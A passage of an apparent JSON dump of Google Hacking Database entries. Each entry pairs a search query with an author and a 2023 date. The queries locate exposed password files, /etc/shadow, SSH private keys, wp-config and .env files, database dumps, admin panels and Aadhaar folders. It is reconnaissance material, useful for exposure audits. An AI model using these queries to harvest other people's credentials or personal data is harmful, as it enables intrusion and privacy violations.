Date:21/02/2023\r\n# Exploit Author: Red Blue Ops"}, {"dork": "intitle:\"index of\" intext:\"Apache/1.4\"", "description": "# Google Dork: intitle:\"index of\" intext:\"Apache/1.4\"\r\n# Files Containing Juicy Info\r\n# Date:21/02/2023\r\n# Exploit Author: Ismail Tasdelen"}, {"dork": "DHDB - GOOGLE DORK", "description": "# Google Dork: index.of conf.php\r\n# Files Containing Juicy Info\r\n# Date:21/02/2023\r\n# Exploit Author: Ishaq Mahmud"}, {"dork": "intitle:index.of intext:log inurl:nasa", "description": "# Google Dork: intitle:index.of intext:log inurl:nasa\r\n# Files Containing Juicy Info\r\n# Date:21/02/2023\r\n# Exploit Author: Rhishinathvarma Marimuthu"}, {"dork": "Index:Index of /wp-admin", "description": "# Google Dork: Index:Index of /wp-admin\r\n# Files Containing Juicy Info\r\n# Date:22/02/2023\r\n# Exploit Author: Kayala Satya Prakash"}, {"dork": "intitle:\"index of /\" intext:\".db", "description": "# Google Dork: intitle:\"index of /\" intext:\".db\r\n# Files Containing Juicy Info\r\n# Date:22/02/2023\r\n# Exploit Author: isa ghojaria"}, {"dork": "intext:phpMiniAdmin inurl:phpminiadmin ext:php", "description": "# Google Dork: intext:phpMiniAdmin inurl:phpminiadmin ext:php\r\n# Files Containing Juicy Info\r\n# Date:22/02/2023\r\n# Exploit Author: Nullfuzz"}, {"dork": "inurl:backup filetype:sql", "description": "# Google Dork: inurl:backup filetype:sql\r\n# Files Containing Juicy Info\r\n# Date:22/02/2023\r\n# Exploit Author: Nox Mentor"}, {"dork": "New Google Dork Discovery: Indexof:admin site:*.com", "description": "# Google Dork: Indexof:admin site:*.com\r\n# Files Containing Juicy Info\r\n# Date:24/02/2023\r\n# Exploit Author: Alok Bhagat"}, {"dork": "intext:\"index of\" \"config\"", "description": "# Google Dork: intext:\"index of\" \"config\"\r\n# Files Containing Juicy Info\r\n# Date:24/02/2023\r\n# Exploit Author: Muhammad Navaid Zafar Ansari"}, {"dork": "intitle:\"Index of /cam/\"", "description": "# Google Dork: intitle:\"Index of /cam/\"\r\n# Files Containing Juicy Info\r\n# Date:27/02/2023\r\n# Exploit Author: Sanu Jose M"}, {"dork": "intitle:\"index of\" intext:user inurl:data", "description": "# Google Dork: intitle:\"index of\" intext:user inurl:data\r\n# Files Containing Juicy Info\r\n# Date:27/02/2023\r\n# Exploit Author: Echo Programs"}, {"dork": "Dork wp-config.bak - Exploit Title: intext: \"index of\" \"wp-config.php.bak\"", "description": "# Google Dork: Dork wp-config.bak - Exploit Title: intext: \"index of\" \"wp-config.php.bak\"\r\n# Files Containing Juicy Info\r\n# Date:27/02/2023\r\n# Exploit Author: NeoInvasor"}, {"dork": "index of:admin.asp", "description": "# Google Dork: index of:admin.asp\r\n# Files Containing Juicy Info\r\n# Date:27/02/2023\r\n# Exploit Author: index of:admin.asp"}, {"dork": "allintitle:\"ProjectDox Login\"", "description": "# Google Dork: allintitle:\"ProjectDox Login\"\r\n# Files Containing Juicy Info\r\n# Date:28/02/2023\r\n# Exploit Author: GirlsLearnCyber"}, {"dork": "intitle:\"index of\" /etc/shadow", "description": "# Google Dork: intitle:\"index of\" /etc/shadow\r\n# Files Containing Juicy Info\r\n# Date:07/03/2023\r\n# Exploit Author: Husain Saleem"}, {"dork": "intitle:\"index of\" inurl:admin/login", "description": "# Google Dork: intitle:\"index of\" inurl:admin/login\r\n# Files Containing Juicy Info\r\n# Date:07/03/2023\r\n# Exploit Author: AJAY JOSEPH"}, {"dork": "intext:\"index of\" \"wp-content.zip\" - Files Containing Juicy Info", "description": "# Google Dork: intext:\"index of\" \"wp-content.zip\"\r\n# Files Containing Juicy Info\r\n# Date:09/03/2023\r\n# Exploit Author: Sharique Raza"}, {"dork": "Re: New Dork Submission for Google Hacking Database !!", "description": "# Google Dork: \"intitle:index of wp-content/plugins/wp-mail-smtp/\"\r\n# Files Containing Juicy Info\r\n# Date:09/03/2023\r\n# Exploit Author: Ishwar Kumar"}, {"dork": "intext:\"index of\" smb.conf", "description": "# Google Dork: intext:\"index of\" smb.conf\r\n# Files Containing Juicy Info\r\n# Date:13/03/2023\r\n# Exploit Author: Konat\u00e9 Olivier"}, {"dork": "inurl:robots filetype:txt", "description": "# Google Dork: inurl:robots filetype:txt\r\n# Files Containing Juicy Info\r\n# Date:13/03/2023\r\n# Exploit Author: Konat\u00e9 Olivier"}, {"dork": "intitle:\"index of\" \"database.sql\"", "description": "# Google Dork: intitle:\"index of\" \"database.sql\"\r\n# Files Containing Juicy Info\r\n# Date:14/03/2023\r\n# Exploit Author: Prathamesh Pawar"}, {"dork": "Re: intext:\"index of\" \"wp-content.zip\" - Files Containing Juicy Info", "description": "# Google Dork: intext:\"index of\" \"wp-content.zip\"\r\n# Files Containing Juicy Info\r\n# Date:14/03/2023\r\n# Exploit Author: Sharique Raza"}, {"dork": "intitle:\"index of\" inurl:wp-json index.json", "description": "# Google Dork: intitle:\"index of\" inurl:wp-json index.json\r\n# Files Containing Juicy Info\r\n# Date:14/03/2023\r\n# Exploit Author: Rutvik Jaini"}, {"dork": "inurl:login/login", "description": "# Google Dork: inurl:login/login\r\n# Files Containing Juicy Info\r\n# Date:16/03/2023\r\n# Exploit Author: Javier Bernardo"}, {"dork": "site:.in intext:\"Index of\" intitle:\"index of\"", "description": "# Google Dork: site:.in intext:\"Index of\" intitle:\"index of\"\r\n# Files Containing Juicy Info\r\n# Date:16/03/2023\r\n# Exploit Author: BASIL ELDHOSE"}, {"dork": "inurl: \"phpmyadmin/setup/\"", "description": "# Google Dork: inurl: \"phpmyadmin/setup/\"\r\n# Files Containing Juicy Info\r\n# Date:16/03/2023\r\n# Exploit Author: Arjun Chandarana"}, {"dork": "site:.com intitle:index of /wp-admin", "description": "# Google Dork: site:.com intitle:index of /wp-admin\r\n# Files Containing Juicy Info\r\n# Date:16/03/2023\r\n# Exploit Author: PRINCY M JOSE"}, {"dork": "inurl:ssh intitle:index of /files", "description": "# Google Dork: inurl:ssh intitle:index of /files\r\n# Files Containing Juicy Info\r\n# Date:16/03/2023\r\n# Exploit Author: PRINCY M JOSE"}, {"dork": "inurl:\"/api-docs\"", "description": "# Google Dork: inurl:\"/api-docs\"\r\n# Files Containing Juicy Info\r\n# Date:16/03/2023\r\n# Exploit Author: Arjun Chandarana"}, {"dork": "intitle:\"index of\" \"checkout\"", "description": "# Google Dork: intitle:\"index of\" \"checkout\"\r\n# Files Containing Juicy Info\r\n# Date:16/03/2023\r\n# Exploit Author: Faizan Akhtar"}, {"dork": "intitle:\"Index of\" site:.bd", "description": "# Google Dork: intitle:\"Index of\" site:.bd\r\n# Files Containing Juicy Info\r\n# Date:21/03/2023\r\n# Exploit Author: Soriful Islam"}, {"dork": "intitle:\"index of\" inurl:admin/php", "description": "# Google Dork: intitle:\"index of\" inurl:admin/php\r\n# Files Containing Juicy Info\r\n# Date:21/03/2023\r\n# Exploit Author: Md Hasib"}, {"dork": "allintitle:\"VidyoRouter Configuration\"", "description": "# Google Dork: allintitle:\"VidyoRouter Configuration\"\r\n# Files Containing Juicy Info\r\n# Date:24/03/2023\r\n# Exploit Author: Heverin Hacker"}, {"dork": "intitle:\"index of \"conf.json\"", "description": "# Google Dork: intitle:\"index of \"conf.json\"\r\n# Files Containing Juicy Info\r\n# Date:29/03/2023\r\n# Exploit Author: Suman Das"}, {"dork": "BroadBand Device Webserver", "description": "# Google Dork: BroadBand Device Webserver\r\n# Files Containing Juicy Info\r\n# Date:29/03/2023\r\n# Exploit Author: Shx"}, {"dork": "intitle:index of django/admin site:.*", "description": "# Google Dork: intitle:index of django/admin site:.*\r\n# Files Containing Juicy Info\r\n# Date:29/03/2023\r\n# Exploit Author: Md rofikul"}, {"dork": "intitle:\"index of \"application.yml\"", "description": "# Google Dork: intitle:\"index of \"application.yml\"\r\n# Files Containing Juicy Info\r\n# Date:29/03/2023\r\n# Exploit Author: Suman Das"}, {"dork": "intitle:\"index of \" \"shell.txt\"", "description": "# Google Dork: intitle:\"index of \" \"shell.txt\"\r\n# Files Containing Juicy Info\r\n# Date:30/03/2023\r\n# Exploit Author: Delowar Hossain"}, {"dork": "intitle:'Sypex Dumper\" inurl:sxd", "description": "# Google Dork: intitle:'Sypex Dumper\" inurl:sxd\r\n# Files Containing Juicy Info\r\n# Date:06/04/2023\r\n# Exploit Author: Cyber Cyber"}, {"dork": "intext:\"index of\" downloads\" site:*.*", "description": "# Google Dork: intext:\"index of\" downloads\" site:*.*\r\n# Files Containing Juicy Info\r\n# Date:06/04/2023\r\n# Exploit Author: Monirul Islam"}, {"dork": "GHDB-GOOGLE DORK", "description": "# Google Dork: index.of conf.bak\r\n# Files Containing Juicy Info\r\n# Date:06/04/2023\r\n# Exploit Author: Ishaq Mahmud"}, {"dork": "Dork Submission", "description": "# Google Dork: index of: admin.json\r\n# Files Containing Juicy Info\r\n# Date:06/04/2023\r\n# Exploit Author: Ahmed Morve"}, {"dork": "intitle:\"index of /\" \"docker-compose.yml\" \".env\"", "description": "# Google Dork: intitle:\"index of /\" \"docker-compose.yml\" \".env\"\r\n# Files Containing Juicy Info\r\n# Date: 06/04/2023\r\n# Exploit Author: Azar A. Nariman"}, {"dork": "intitle:\"index of /\" \"public.zip\"", "description": "# Google Dork: intitle:\"index of /\" \"public.zip\"\r\n# Files Containing Juicy Info\r\n# Date: 06/04/2023\r\n# Exploit Author: Azar A. Nariman"}, {"dork": "intitle:\"index of /\" \"admin.zip\" \"admin/\"", "description": "# Google Dork: intitle:\"index of /\" \"admin.zip\" \"admin/\"\r\n# Files Containing Juicy Info\r\n# Date: 06/04/2023\r\n# Exploit Author: Azar A. Nariman"}, {"dork": "intitle:\"index of /\" \".apk\" inurl:\".ir/\"", "description": "# Google Dork: intitle:\"index of /\" \".apk\" inurl:\".ir/\"\r\n# Files Containing Juicy Info\r\n# Date: 04/06/2023\r\n# Exploit Author: Azar A. Nariman"}, {"dork": "inurl:\"/scada-vis\"", "description": "# Google Dorks: inurl:\"/scada-vis\"\r\n# Files Containing Juicy Info\r\n# Date:06/04/2023\r\n# Exploit Author: Parsa Rezaie Khiabanloo"}, {"dork": "inurl:*/signIn.do", "description": "# Google Dork: inurl:*/signIn.do\r\n# Files Containing Juicy Info\r\n# Date:06/04/2023\r\n# Exploit Author: ABHISHEK UZUMAKI"}, {"dork": "intitle:\"index of\" \"config.html\"", "description": "# Google Dork: intitle:\"index of\" \"config.html\"\r\n# Files Containing Juicy Info\r\n# Date:06/04/2023\r\n# Exploit Author: Delowar Hossain"}, {"dork": "inurl:\":8080/\" intext:\"index of /\" \"win64\" -LiteSpeed", "description": "# Google Dork: inurl:\":8080/\" intext:\"index of /\" \"win64\" -LiteSpeed\r\n# Files Containing Juicy Info\r\n# Date:10/04/2023\r\n# Exploit Author: Azar A. Nariman"}, {"dork": "inurl:\".ir/\" intext:\"index of /\" \".ovpn\"", "description": "# Google Dork: inurl:\".ir/\" intext:\"index of /\" \".ovpn\"\r\n# Files Containing Juicy Info\r\n# Date:10/04/2023\r\n# Exploit Author: Azar A. Nariman"}, {"dork": "intitle:\"index of /\" \"styleci.yml\" \".env\"", "description": "# Google Dork: intitle:\"index of /\" \"styleci.yml\" \".env\"\r\n# Files Containing Juicy Info\r\n# Date:12/04/2023\r\n# Exploit Author: Azar Abdulla"}, {"dork": "inurl:\"/private\" intext:\"index of /\" inurl:\"owncloud\" -litespeed", "description": "# Google Dork: inurl:\"/private\" intext:\"index of /\" inurl:\"owncloud\" -litespeed\r\n# Files Containing Juicy Info\r\n# Date:12/04/2023\r\n# Exploit Author: Azar Abdulla"}, {"dork": "inurl:\"/private\" intext:\"index of /\" \"win64\" -litespeed", "description": "# Google Dork: inurl:\"/private\" intext:\"index of /\" \"win64\" -litespeed\r\n# Files Containing Juicy Info\r\n# Date:12/04/2023\r\n# Exploit Author: Azar A. Nariman"}, {"dork": "intitle:\"index of\" \"properties.json\"", "description": "# Google Dork: intitle:\"index of\" \"properties.json\"\r\n# Files Containing Juicy Info\r\n# Date: 13/04/2023\r\n# Exploit Author: Arnob Biswas"}, {"dork": "intitle:\"index of\" \"config.php\"", "description": "# Google Dork: intitle:\"index of\" \"config.php\"\r\n# Files Containing Juicy Info\r\n# Date: 13/04/2023\r\n# Exploit Author: Jerr279"}, {"dork": "intitle:\"index of \" \"config/db\"", "description": "# Google Dork: intitle:\"index of\" \"properties.json\"\r\n# Files Containing Juicy Info\r\n# Date: 13/04/2023\r\n# Exploit Author: Jerr279"}, {"dork": "inurl:\"/private\" intext:\"index of /\" \"config\"", "description": "# Google Dork: inurl:\"/private\" intext:\"index of /\" \"config\"\r\n# Files Containing Juicy Info\r\n# Date: 13/04/2023\r\n# Exploit Author: Jerr279"}, {"dork": "inurl:info.php intext:\"PHP Version\" intitle:\"phpinfo()\"", "description": "# Google Dork: inurl:info.php intext:\"PHP Version\" intitle:\"phpinfo()\"\r\n# Files containing juicy info.\r\n# Date: 13/04/2023\r\n# Exploit Author: Vitor Guaxi"}, {"dork": "About dorks", "description": "# Google Dork: intitle: index of /phpMyAdmin/index.php\r\n# Files Containing Juicy Info\r\n# Date:17/04/2023\r\n# Exploit Author: Rajendra Prasad Dhital"}, {"dork": "intext:\"Index of\" intext:\"backup.tar\"", "description": "# Google Dork: intext:\"Index of\" intext:\"backup.tar\"\r\n# Files Containing Juicy Info\r\n# Date:20/04/2023\r\n# Exploit Author: PARAG BAGUL"}, {"dork": "Index of\" intext:\"source_code.zip", "description": "# Google Dork: Index of\" intext:\"source_code.zip\r\n# Files Containing Juicy Info\r\n# Date:20/04/2023\r\n# Exploit Author: PARAG BAGUL"}, {"dork": "intext:\"Index of\" intext:\"backend/\"", "description": "# Google Dork: intext:\"Index of\" intext:\"backend/\"\r\n# Files Containing Juicy Info\r\n# Date:20/04/2023\r\n# Exploit Author: PARAG BAGUL"}, {"dork": "intext:\"Index of\" intext:\"plugin/\"", "description": "# Google Dork: intext:\"Index of\" intext:\"plugin/\"\r\n# Files Containing Juicy Info\r\n# Date:20/04/2023\r\n# Exploit Author: PARAG BAGUL"}, {"dork": "intext:\"Index of\" intext:\"bitbucket-pipelines.yml\"", "description": "# Google Dork: intext:\"Index of\" intext:\"bitbucket-pipelines.yml\"\r\n# Files Containing Juicy Info\r\n# Date:20/04/2023\r\n# Exploit Author: PARAG BAGUL"}, {"dork": "intext:\"Index of\" intext:\"/etc\"", "description": "# Google Dork: intext:\"Index of\" intext:\"/etc\"\r\n# Files Containing Juicy Info\r\n# Date:20/04/2023\r\n# Exploit Author: PARAG BAGUL"}, {"dork": "Re: Thank you for your submission! Re: intitle:index of db.sqlite3", "description": "# Google Dork: intitle:index of db.sqlite3\r\n# Files Containing Juicy Info\r\n# Date:20/04/2023\r\n# Exploit Author: Shebu"}, {"dork": "intext:pom.xml intitle:\"index of /\"", "description": "# Google Dork: intext:pom.xml intitle:\"index of /\"\r\n# Files Containing Juicy Info\r\n# Date:21/04/2023\r\n# Exploit Author: Sagar Banwa"}, {"dork": "Re: intitle:\"index of\" \"docker-compose.yml\"", "description": "# Google Dork: intitle:\"index of\" \"docker-compose.yml\"\r\n# Files Containing Juicy Info\r\n# Date:28/04/2023\r\n# Exploit Author: Mohd S"}, {"dork": "Re: GHDB Dork", "description": "# Google Dork: intitle:index.of conf.mysql\r\n# Files Containing Juicy Info\r\n# Date:02/05/2023\r\n# Exploit Author: Ramjan Ali Sabber"}, {"dork": "inurl: \"/wp-content/uploads\"", "description": "# Google Dork: inurl: \"/wp-content/uploads\"\r\n# Files Containing Juicy Info\r\n# Date:02/05/2023\r\n# Exploit Author: Andrew Gimenez"}, {"dork": "Google dork submission: intitle:\"index of\" \"users.yml\" | \"admin.yml\" | \"config.yml\"", "description": "# Google Dork: intitle:\"index of\" \"users.yml\" | \"admin.yml\" | \"config.yml\"\r\n# Files Containing Juicy Info\r\n# Date:02/05/2023\r\n# Exploit Author: Mohammed A.Siledar"}, {"dork": "intitle:\"index of \"phpunit.yml\"", "description": "# Google Dork: intitle:\"index of \"phpunit.yml\"\r\n# Files Containing Juicy Info\r\n# Date:05/05/2023\r\n# Exploit Author: Suman Das"}, {"dork": "intext:\"index of\" inurl:jwks-rsa", "description": "# Google Dork: intext:\"index of\" inurl:jwks-rsa\r\n# Files Containing Juicy Info\r\n# Date:05/05/2023\r\n# Exploit Author: Praharsh Kumar Singh"}, {"dork": "intitle:\"index of\" \"download.php?file=\"", "description": "# Google Dork: intitle:\"index of\" \"download.php?file=\"\r\n# Files Containing Juicy Info\r\n# Date:05/05/2023\r\n# Exploit Author: Praharsh Kumar Singh"}, {"dork": "intext:\"index of\" inurl:json-rpc", "description": "# Google Dork: intext:\"index of\" inurl:json-rpc\r\n# Files Containing Juicy Info\r\n# Date:05/05/2023\r\n# Exploit Author: Praharsh Kumar Singh"}, {"dork": "inurl:\"wp-content\" intitle:\"index.of\" intext:backup\"", "description": "# Google Dork: inurl:\"wp-content\" intitle:\"index.of\" intext:backup\"\r\n# Files Containing Juicy Info\r\n# Date:05/05/2023\r\n# Exploit Author: Andrew Gimenez"}, {"dork": "inurl:\"wp-content\" intitle:\"index.of\" intext:wp-config.php", "description": "# Google Dork: inurl:\"wp-content\" intitle:\"index.of\" intext:wp-config.php\r\n# Files Containing Juicy Info\r\n# Date:05/05/2023\r\n# Exploit Author: Andrew Gimenez"}, {"dork": "inurl:\"php?sql=select\" ext:php", "description": "# Google Dork: inurl:\"php?sql=select\" ext:php\r\n# Files Containing Juicy Info\r\n# Date:08/05/2023\r\n# Exploit Author: dmr"}, {"dork": "inurl: /libraries/joomla/database/", "description": "# Google Dork: inurl: /libraries/joomla/database/\r\n# Files Containing Juicy Info\r\n# Date:08/05/2023\r\n# Exploit Author: Mark Ivan David"}, {"dork": "inurl:/wp-login.php?action=register intext:\"Register For This Site\"", "description": "# Google Dork: inurl:/wp-login.php?action=register intext:\"Register For This Site\"\r\n# Files Containing Juicy Info\r\n# Date:16/05/2023\r\n# Exploit Author: Puneet Saraswat"}, {"dork": "inurl:user intitle:\"Drupal\" intext:\"Log in\" -\"powered by\"", "description": "# Google Dork: inurl:user intitle:\"Drupal\" intext:\"Log in\" -\"powered by\"\r\n# Files Containing Juicy Info\r\n# Date:16/05/2023\r\n# Exploit Author: Puneet Saraswat"}, {"dork": "CMS Made Simple < 2.2.10 - SQL Injection", "description": "# Google Dork: CMS Made Simple < 2.2.10 - SQL Injection\r\n# Files Containing Juicy Info\r\n# Date:16/05/2023\r\n# Exploit Author: Daniele Scanu"}, {"dork": "inurl:wp-content/uploads/wcpa_uploads", "description": "# Google Dork: inurl:wp-content/uploads/wcpa_uploads\r\n# Files Containing Juicy Info\r\n# Date: 17/05/2023\r\n# Author: Stuart Steenberg"}, {"dork": "Files Containing Juicy Info", "description": "# Google Dork: intitle:\"index of \"main.yml\"\r\n# Files Containing Juicy Info\r\n# Date:26/05/2023\r\n# Exploit Author: muhammetadibas"}, {"dork": "Vulnerable Files", "description": "# Google Dork: inurl:uploadimage.php\r\n# Files Containing Juicy Info\r\n# Date:26/05/2023\r\n# Exploit Author: muhammetadibas"}, {"dork": "intitle:\"Sharing API Info\"", "description": "# Google Dork: intitle:\"Sharing API Info\"\r\n# Files Containing Juicy Info\r\n# Date:26/05/2023\r\n# Exploit Author: dmr"}, {"dork": "intitle:\"index of\" github-api", "description": "# Google Dork: intitle:\"index of\" github-api\r\n# Files Containing Juicy Info\r\n# Date:26/05/2023\r\n# Exploit Author: Midhya Mathew"}, {"dork": "intitle:\"index of\" google-maps-api", "description": "# Google Dork: intitle:\"index of\" google-maps-api\r\n# Files Containing Juicy Info\r\n# Date:26/05/2023\r\n# Exploit Author: Midhya Mathew"}, {"dork": "intitle:\"Index of\" inurl:/backup/ \"admin.zip\"", "description": "# Google Dork: intitle:\"Index of\" inurl:/backup/ \"admin.zip\"\r\n# Files Containing Juicy Info\r\n# Date:26/05/2023\r\n# Exploit Author: Midhya Mathew"}, {"dork": "inurl:*/wp-content/plugins/contact-form-7/", "description": "# Google Dork: inurl:*/wp-content/plugins/contact-form-7/\r\n# Files Containing Juicy Info\r\n# Date:26/05/2023\r\n# Exploit Author: Bappe Sarker"}, {"dork": "Re: \"index of /backup.sql", "description": "# Google Dork: index of /backup.sql\r\n# Files Containing Juicy Info\r\n# Date:26/05/2023\r\n# Exploit Author: Ramjan Ali Sabber"}, {"dork": "Re: intitle:index.of conf.php", "description": "# Google Dork: intitle:index.of conf.php\r\n# Files Containing Juicy Info\r\n# Date:26/05/2023\r\n# Exploit Author: Ramjan Ali Sabber"}, {"dork": "intitle:\"index of\" \"profiler\"", "description": "# Google Dork: intitle:\"index of\" \"profiler\"\r\n# Files Containing Juicy Info\r\n# Date:31/05/2023\r\n# Exploit Author: Praharsh Kumar Singh"}, {"dork": "intitle:\"index of\" \"private.properties\"", "description": "# Google Dork: intitle:\"index of\" \"private.properties\"\r\n# Files Containing Juicy Info\r\n# Date:31/05/2023\r\n# Exploit Author: Praharsh Kumar Singh"}, {"dork": "allintitle:\"macOS Server\" site:.edu", "description": "# Google Dork: allintitle:\"macOS Server\" site:.edu\r\n# Files Containing Juicy Info\r\n# Date:31/05/2023\r\n# Exploit Author: Thomas Heverin"}, {"dork": "inurl:wp-content/uploads/sites", "description": "# Google Dork: inurl:wp-content/uploads/sites\r\n# Files Containing Juicy Info\r\n# Date:31/05/2023\r\n# Exploit Author: Stuart Steenberg"}, {"dork": "intitle:\"SCM Manager\" intext:1.60", "description": "# Google Dork: intitle:\"SCM Manager\" intext:1.60\r\n# Files Containing Juicy Info\r\n# Date:31/05/2023\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "RE: inurl:/wp-content/uploads/wpo_wcpdf", "description": "# Google Dork: inurl:/wp-content/uploads/wpo_wcpdf\r\n# Files Containing Juicy Info\r\n# Date:02/06/2023\r\n# Exploit Author: Stuart Steenberg"}, {"dork": "intext:\"ArcGIS REST Services Directory\" intitle:\"Folder: /\"", "description": "# Google Dork: intext:\"ArcGIS REST Services Directory\" intitle:\"Folder: /\"\r\n# Files Containing Juicy Info\r\n# Date:02/06/2023\r\n# Exploit Author: Alonso Eduardo Caballero Quezada"}, {"dork": "Google dorks", "description": "# Google Dork: intext:\"/login.php\" intitle:\"login\"\r\n# Files Containing Juicy Info\r\n# Date: 04/06/2023\r\n# Exploit Author: Avadhesh Nishad\r\n\r\n\r\n\r\n\r\n\r\nAvadhesh Nishad\r\n\r\n( WEB APPLICATION SECURITY RESEARCHERS )\r\n\r\n\r\n*POC Images Attached with this mail.*\r\n\r\n\r\n[image: Screenshot (4).png]\r\n[image: Screenshot (5).png]"}, {"dork": "intitle:\"index of\" \"pass.txt\"", "description": "# Google Dork: intitle:\"index of\" \"pass.txt\"\r\n# Files Containing Juicy Info\r\n# Date: 17/07/2023\r\n# Exploit Author: Aashiq Ahamed"}, {"dork": "intitle:\"index of\" \"config.txt\"", "description": "# Google Dork: intitle:\"index of\" \"config.txt\"\r\n# Files Containing Juicy Info\r\n# Date: 17/07/2023\r\n# Exploit Author: Aashiq Ahamed"}, {"dork": "allintext:static/uploads", "description": "# Google Dork: allintext:static/uploads\r\n# Files Containing Juicy Info\r\n# Date: 07/09/2023\r\n# Exploit Author: Affan Ali"}, {"dork": "inurl: /default.rdp", "description": "# Google Dork: inurl: /default.rdp\r\n# Files Containing Juicy Info\r\n# Date: 07/09/2023\r\n# Exploit Author: Arjun Vijaypal Singh"}, {"dork": "My name is Jannatul Adnin and I would like to report a new Google dork.", "description": "# Google Dork: inurl:\"/admin\" intitle:\"portfolio\".\r\n# Files Containing Juicy Info\r\n# Date: 08/09/2023\r\n# Exploit Jannatul Adnin"}, {"dork": "new google dork", "description": "# Google Dork: index of cpanel.txt\r\n# Files Containing Juicy Info\r\n# Date: 08/09/2023\r\n# Author: Ved Kolambkar"}, {"dork": "intitle:\"Index of /api/\"", "description": "# Google Dork: intitle:\"Index of /api/\"\r\n# Files Containing Juicy Info\r\n# Date: 11/09/2023\r\n# Exploit Kamran Saifullah"}, {"dork": "intitle:\"Index of /bank/\"", "description": "Google Dork: intitle:\"Index of /bank/\"\r\n# Files Containing Juicy Info\r\n# Date: 11/09/2023\r\n# Exploit Kamran Saifullah"}, {"dork": "inurl:php?id=1 site:com", "description": "Google Dork: inurl:php?id=1 site:com\r\n# Files Containing Juicy Info\r\n# Date: 11/09/2023\r\n# Exploit Akshad Joshi"}, {"dork": "inurl:\"cf/assets\" \"MultiFileUpload.swf\"", "description": "Google Dork: inurl:\"cf/assets\" \"MultiFileUpload.swf\"\r\n# Files Containing Juicy Info\r\n# Date: 11/09/2023\r\n# Exploit Author: Datain Alexandre"}, {"dork": "intitle:\"index of /wp-content/plugins\"", "description": "Google Dork: intitle:\"index of /wp-content/plugins\"\r\n# Files Containing Juicy Info\r\n# Date: 11/09/2023\r\n# Exploit Ritesh Sahu"}, {"dork": "intitle:\"index of\" \".ssh\" OR \"ssh_config\" OR \"ssh_known_hosts\" OR \"authorized_keys\" OR \"id_rsa\" OR \"id_dsa\"", "description": "Google Dork: intitle:\"index of\" \".ssh\" OR \"ssh_config\" OR \"ssh_known_hosts\" OR \"authorized_keys\" OR \"id_rsa\" OR \"id_dsa\"\r\n# Files Containing Juicy Info\r\n# Date: 11/09/2023\r\n# Exploit Ritesh Sahu"}, {"dork": "inurl:wp-includes", "description": "# Google Dork: inurl:\"wp-includes\"\r\n# Files Containing Juicy Info\r\n# Date: 11/09/2023\r\n# Exploit Author: Jose Rivas Aka. Bl4cksku11"}, {"dork": "For Google dork", "description": "# Google Dork: allintitle:\"macOS Server\" site:.com\r\n# Files Containing Juicy Info\r\n# Date: 11/09/2023\r\n# Exploit Kamlesh Pendurkar"}, {"dork": "index of: /aadhar", "description": "# Google Dork: index of: /aadhar\r\n# Files Containing Juicy Info\r\n# Date: 11/09/2023\r\n# Exploit sai vijay kumar M"}, {"dork": "google dork give nginx.conf file", "description": "# Google Dork: intitle:\"index of\" \"nginx.conf\"\r\n# Files Containing Juicy Info\r\n# Date: 11/09/2023\r\n# Exploit Momin Monis"}, {"dork": "inurl:wp-config.txt intext:mysql", "description": "# Google Dork: inurl:wp-config.txt intext:mysql\r\n# Files Containing Juicy Info\r\n# Date: 11/09/2023\r\n# Exploit s Thakur"}, {"dork": "inurl:/phpMyAdmin/index.php?server=1", "description": "# Google Dork: inurl:/phpMyAdmin/index.php?server=1\r\n# Files Containing Juicy Info\r\n# Date: 11/09/2023\r\n# Exploit Aashiq Ahamed"}, {"dork": "intitle:\"index of\" \".sql\"", "description": "# Google Dork: intitle:\"index of\" \".sql\"\r\n# Files Containing Juicy Info\r\n# Date: 12/09/2023\r\n# Exploit Aashiq Ahamed"}, {"dork": "site: zoom+meeting+passcode", "description": "# Google Dork: site: zoom+meeting+passcode\r\n# Files Containing Juicy Info\r\n# Date: 12/09/2023\r\n# Exploit tarun mahato"}, {"dork": "intitle:\"Documentation Index\" intext:\"Apache Tomcat Servlet\" inurl:\"docs\"", "description": "# Google Dork: intitle:\"Documentation Index\" intext:\"Apache Tomcat Servlet\" inurl:\"docs\"\r\n# Files Containing Juicy Info\r\n# Date: 02/10/2023\r\n# Exploit Nullfuzz"}, {"dork": "intitle:\"index of\" \"npm-debug.log\"", "description": "# Google Dork: intitle:\"index of\" \"npm-debug.log\"\r\n# Files Containing Juicy Info\r\n# Date: 02/10/2023\r\n# Exploit Chinmay Divekar"}, {"dork": "intitle:\"index of\" \"backup.zip\"", "description": "# Google Dork: intitle:\"index of\" \"backup.zip\"\r\n# Files Containing Juicy Info\r\n# Date: 02/10/2023\r\n# Exploit Sachin Gupta"}, {"dork": "intitle:\"index of\" \"creds.txt\"", "description": "# Google Dork: intitle:\"index of\" \"creds.txt\"\r\n# Files Containing Juicy Info\r\n# Date: 02/10/2023\r\n# Exploit Aashiq Ahamed"}, {"dork": "intitle:\"index of\" \"C:Windows\"", "description": "# Google Dork: intitle:\"index of\" \"C:\\Windows\"\r\n# Files Containing Juicy Info\r\n# Date: 02/10/2023\r\n# Exploit Aashiq Ahamed"}, {"dork": "intitle:\"index of\" \"login.php.txt\"", "description": "# Google Dork: intitle:\"index of\" \"login.php.txt\"\r\n# Files Containing Juicy Info\r\n# Date: 02/10/2023\r\n# Exploit Aashiq Ahamed"}, {"dork": "intitle:\"index of\" \"username.txt\"", "description": "# Google Dork: intitle:\"index of\" \"username.txt\"\r\n# Files Containing Juicy Info\r\n# Date: 02/10/2023\r\n# Exploit Ranjeet Jaiswal"}, {"dork": "intitle:\"index of\" \"configuration.txt\"", "description": "# Google Dork: intitle:\"index of\" \"configuration.txt\"\r\n# Files Containing Juicy Info\r\n# Date: 02/10/2023\r\n# Exploit Ranjeet Jaiswal"}, {"dork": "intitle:\"index of\" \"domain.txt\"", "description": "# Google Dork: intitle:\"index of\" \"domain.txt\"\r\n# Files Containing Juicy Info\r\n# Date: 02/10/2023\r\n# Exploit Ranjeet Jaiswal"}, {"dork": "intitle:\"index of\" \"bugs.txt\"", "description": "# Google Dork: intitle:\"index of\" \"bugs.txt\"\r\n# Files Containing Juicy Info\r\n# Date: 02/10/2023\r\n# Exploit Ranjeet Jaiswal"}, {"dork": "intitle:\"index of\" \"postman_collection.json\"", "description": "# Google Dork: intitle:\"index of\" \"postman_collection.json\"\r\n# Files Containing Juicy Info\r\n# Date: 16/10/2023\r\n# Exploit Chinmay Divekar"}, {"dork": "intitle:\"Index of\" inurl:/backup/ \"wp-config\"", "description": "# Google Dork: intitle:\"Index of\" inurl:/backup/ \"wp-config\"\r\n# Files Containing Juicy Info\r\n# Date: 16/10/2023\r\n# Exploit Author: William Bastos"}, {"dork": "intitle:\"index of\" intext: \"login.php\"", "description": "# Google Dork: intitle:\"index of\" 